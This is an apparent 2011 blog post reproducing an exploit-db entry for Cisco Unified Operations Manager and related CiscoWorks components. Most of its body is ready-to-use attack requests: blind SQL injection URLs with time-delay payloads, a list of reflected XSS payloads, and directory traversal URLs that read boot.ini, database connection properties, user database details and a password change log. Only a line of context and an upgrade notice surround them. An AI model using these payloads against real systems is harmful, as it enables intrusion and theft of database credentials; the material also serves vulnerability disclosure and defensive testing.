Jul
6
2011

Cisco Unified Operations Manager exploits

Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network.

Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include:

  • multiple blind SQL injections
  • multiple XSS
  • directory traversal vulnerability

Below the source of the exploit (Only for test!).

Blind SQL injection vulnerabilities that affect CuOM (CVE-2011-0960):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call:

/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote:

/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--

Reflected XSS vulnerabilities that affect CuOM (CVE-2011-0959):

/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7

Reflected XSS vulnerability that affect Common Services Device Center (CVE-2011-0962):

/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987

Reflected XSS vulnerability that affects Common Services Framework Help Servlet (CVE-2011-0961):

/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1

Directory traversal vulnerability that affects CiscoWorks Homepage (CVE-2011-0966):

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

cmfDBA user database info:

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties

DB connection info for all databases:

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

DB password change log:

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\log\dbpwdChange.log

Solution: Upgrade to CuOM 8.6.

References: http://www.exploit-db.com/exploits/17304/